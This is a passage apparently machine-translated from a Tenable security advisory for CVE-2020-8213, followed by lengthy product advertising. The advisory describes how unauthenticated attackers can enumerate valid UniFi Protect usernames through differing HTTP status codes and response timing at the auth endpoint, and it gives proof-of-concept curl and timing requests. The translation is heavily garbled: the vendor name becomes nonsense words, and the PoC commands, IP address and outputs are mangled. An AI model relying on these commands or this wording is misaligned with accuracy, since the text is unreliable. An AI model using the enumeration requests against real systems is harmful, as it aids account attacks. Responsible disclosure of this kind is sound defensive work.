脸书 Google+ 微博 LinkedIn YouTube系统 RSS系统 菜单类 搜索 资源-博客 资源-Webinar 资源-报表 资源-事件 图标#066 图标_067 图标_068 图标_069 图标070

Ubiquiti单线保护用户名发现

中度
View更多研究建议

简表

可点名发现Unifi保护 v113.3下两种用户名发现漏洞,允许远程非认证攻击者为Unifi保护网络应用发现有效用户名优先脆弱度允许攻击者通过检查服务器HTTP状态代码发现有效用户名,响应对API端点/api/ath的要求二级脆弱度允许攻击者通过检查服务器响应对api/ath端点请求的时序发现有效用户名

Ubiti Unifi保护用户名发现

CVSSv2基本分数:5.0
CVSS v2向量:(AV:N/AC:L/Au:N/C:P/I:N/A:N)

UbitiUnifi保护API包含缺陷,允许远程非认证攻击者通过检查服务器响应HTTP状态码发现Unifi保护Web应用有效用户名

验证请求发送到api/ath端点时,响应状态代码显示用户名有效与否如果用户名无效,服务器返回状态代码400,但如果用户名有效,则返回状态代码401攻击者可使用此缺陷为Unifi保护网络应用列举有效用户名,向API端点发送请求并任意使用用户名并审查每次响应状态代码

缺陷在于执行/usr/share/unifi-protect/app/server.js中的端点函数早期关联端点,无效用户名使函数返回报错响应,包括状态(400)函数下移三处,无效密码引出函数返回报错响应,包括每个案例的“status(401)”。状态代码使用前后不一允许攻击者区分有效用户名和无效用户名

========

概念证明

状态代码为400无效用户名

Untent-Type应用-json安全-XPST httpss/1921.68.30.6:7443/api/a
{ror':无效用户名或密码}400}

untent-Type应用-json安全-XPST httpss://1921.68.30.6:7443/api/a
{ror':无效用户名或密码}400}

$curl-H-Content-Type应用/json-nsecepte-XPST https://1921.68.30.6:7443/api/a
{ror':无效用户名或密码}400}

状态代码为401有效用户名

untent-Type应用-json安全-XPST httpss://1921.68.30.6:7443/api/a
{eror's:'无效用户名或密码'}401

Untent-Type应用-json安全-XPST httpss://1921.68.30.6:7443/api/a
{eror's:'无效用户名或密码'}401

POC脚本测试漏洞

https://github.com/tenable/poc/blob/master/Ubiquiti/UniFi_Protect/cve_2020_8213_unifi_protect_username_discovery.py

Ubiti Unifi保护用户名发现

CVSSv2基本分数:5.0
CVSS v2向量:(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Unifi保护API包含缺陷,允许远程非认证攻击者通过检查服务器响应时间发现Unifi保护网络应用有效用户名验证请求发送到a/api/ath端点时,如果用户名有效,服务器响应时间要长得多攻击者可使用此缺陷为Unifi保护网络应用列举有效用户名,向API端点发送请求并任意使用名并检查服务器响应时推算用户名有效

具体地说,当用户名有效时服务器响应需要较长量级测试中服务器对无效用户名请求的响应以25-50毫秒接收,而服务器对有效用户名请求的响应以300-500毫秒接收

缺陷在于执行/usr/share/unifi-protect/app/server.js中的端点函数端点验证函数中的用户名,当用户名无效时立即返回错误“无效用户名或密码”。用户名有效并密码无效时,返回相同错误消息,但确定密码无效额外处理时间则反映在服务器响应时间中,允许攻击者区分有效用户名和无效用户名

========

概念证明

响应时间为25-50ms无效用户名

timecle-Type应用-json安全-xPST http://192168.30.6:7080/api/a
{ror's:'无效用户名或密码'}
实值0m0.025s
用户0m0.005s
ys0m0.005s

timecle-type应用-json-nsecle-xPST https/1921.68.30.6:7443/api/auth-d
{ror's:'无效用户名或密码'}
实值0m0.050s
用户0m0.010s
sys万元

timecle-Type应用-json安全-xPST http://192168.30.6:7080/api/a
{ror's:'无效用户名或密码'}
实值0m0.028s
用户0m0.005s
ys0m0.005s

响应时间为300-500ms有效用户名

timecle-type-nvr-admin-password-a
{ror's:'无效用户名或密码'}
实战0m0.331s
用户0m0.010s
ys0m0.001s

timecle-Type-nvr-user
{ror's:'无效用户名或密码'}
实值0m0.346s
用户0m0.006s
sys0m0.006s

求解

Unifi保护 v113.4-beta.5

附加引用

https://community.ui.com/releases/Security-advisory-bulletin-013-013/56d4d616-4afd-40ee-863f-319b7126ed84
https://github.com/tenable/poc/blob/master/Ubiquiti/UniFi_Protect/cve_2020_8213_unifi_protect_username_discovery.py

披露时间线

4/16/2020发现易损性
4/16/2020:报告易容性供销商90天披露日期7/16/2020
4/17/2020:供应商确认报告并转发保护队
5/4/2020:可点名供应商更新
5/4/2020:供应商更新预期验证重构云端2.0.0,目前正在内部测试中,他们将尽快与Tenable分享版本
5/4/2020:可租保证供应商知道Beta发布策略
5/28/2020:可点名供应商确认问题仍计划解决CloudKey企业2.0.0并请求ETA发布
5/29/2020:经供应商确认认证重新设计将在云开Gen2企业2.0.0中发布,表示目标是在90天发布日期前发布,发布时通知贝塔
7/6/2020:可点名提醒供应商即将发布日期并请求确认7/16前预期发布
7/9/2020:可点名提醒供应商一周内即将发布日期,提醒供应商披露策略允许延迟发布
7/9/2020:供应商确认即将披露日期,报告因回归和范围更新而意外延迟,请求延迟披露
7/10/2020:可接受请求具体计划发布日期
7/10/2020:供应商仍在规划发布7/16
7/13/2020:可接受确认计划发布日期7/16和预览链接请求,如果发布延迟,供应商尽快通知我们新发布日期不迟于7/16日尾,否则计划7/17发布
7/16/2020:可点名提醒供应商披露日期并请求新的发布日期
7/16/20:Server表示CloudKeyFormware2.0尚未准备发布,
7/16/2020:确认意向7月30日或之前补丁并请求供应商根据我们推迟披露策略提供具体发布日期
7/16/2020:供应商提供fix发布日期2020年7月30日
7/16/2020:可确认计划披露日期更新至7月30日,当修复发布或计划披露日期传递时将发布咨询文件,以较早者为准
7/16/2020:供应商建议修复程序发布贝塔信道为UniFi保护1.13.4-Beta.2和CVE-2020-8213分配
7/17/2020:不完全定时攻击补丁并提供7天窗口
7/22/2020:向供应商推荐1.13.4-Beta.5中更新补丁

TRA建议内所有信息均提供“原封不动”,不提供任何保理,包括隐含可交易性和适切性保证用于特定目的,不保证完整性、准确性或及时性个人和组织负责评估实际或潜在安全漏洞的影响

可租制非常严肃地对待产品安全if you believe你发现我们产品中的脆弱点, 我们请求你与我们合作 快速解决它以保护客户可点信快速响应报告,与研究人员保持通信并快速提供解决方案

关于提交脆弱资料的更多细节,请见我们漏洞报告指南页码

如有问题或更正,请发邮件[email protected]

风险信息

CVE识别码 CVE-2020-8213
可租咨询ID
TRA-2020-45
信用

凯蒂Sexton

sv2基础/时间评分
5.0/4.1
sv2向量
AV:N/AC:L/Au:N/C:P/I:N/A:N
sv3基础/时间评分
5.3/4.9
CVSSv3向量
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
受影响产品
UniFi保护
风险因子
中度

咨询时间线

07/17/2020咨询发布
7/22/2020:更新参考1.13.4-Beta.5解析、更新时间线并添加POC脚本链接
试免费 立即购买

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

可耐受脆弱性管理

前称Tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买
试免费 立即购买

试可穿Nessus专业免费

免费7天

TenableNessus是当今市场最全面的脆弱感扫描器

New-Nessus专家
现可用

奈苏斯专家增加更多特征,包括外部攻击表面扫描能力以及添加域和扫描云基础设施能力点击这里尝试Nessus专家

填表后继续使用NessusPro测试

可买Nessus专业

TenableNessus是当今市场最全面的脆弱感扫描器可租Nessus专业程序帮助脆弱性扫描自动化,在守法周期中省时并允许你加入IT团队

购买多年度许可证并保存添加高级支持访问电话、社区聊天支持全天365天全天24小时

选择您的许可

购买多年度许可证并保存

添加支持培训

立即购买
更新现有牌照| 查找转售者| 请求引文
试免费 立即购买
tenable.io

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产

可租易容性管理实验中也包括可租可租Lumin、可租WebApp扫描和可租云安全

tenable.io 付费

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

65码资产类

选择订阅选项 :

立即购买
试免费 立即购买

可租WebApp扫描试

前称Tenable.ioWeb应用扫描

完全存取最新网络应用扫描服务 设计现代应用安全扫描全在线组合漏洞高精度而不人工重创或干扰关键网络应用现在就签名

可租WebApp扫描实验中也包括可租易用性管理、可租可租鲁明和可租云安全

可租WebApp扫描

前称Tenable.ioWeb应用扫描

完全访问现代云型脆弱管理平台,使你能够以不匹配精度看到并跟踪所有资产购买你年度订阅今天

5 FQDNs

3 578美元

立即购买

试免费 联系人销售

试可腾鲁明

可视化并探索接触管理,跟踪随时间推移降低风险,并参照Tenablelumin对等基准

可点Lumin测试中也包括可点易点管理、可点WebApp扫描和可点云安全

可买路明

联系销售代表,看可租Lumin如何帮助你在整个组织中获取洞察力并管理网络风险

试免费 联系人销售

试可耐云安全

前称可租.cs

完全无障碍检测并修复云基础设施误配置并观察运行时漏洞注册免费测试了解更多试验过程点击这里

可租云安全测试中也包括可租易用性管理、可租可租鲁明和可租WebApp扫描

联系人a购买可租云安全

联系销售代表了解更多可耐云安全知识,并观察多易登录云账号并在分钟内为云误配置和漏洞获取可见度

试免费 立即购买

试可耐奈苏斯专家免费

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

已经有TenableNessus专业
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

立即购买
更新现有牌照| 查找转售者| 请求引用
试免费 立即购买

试Nessus免费专家

免费7天

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

内索斯职业类
升级Nessus专家免费7天

买可租Nessus专家

内苏斯专家为现代攻击面搭建,使你能够看到更多并保护组织从IT到云的漏洞

选择您的许可

购买多年度许可证并存更多

添加支持培训

立即购买
更新现有牌照| 查找转售者| 请求引用
Baidu
map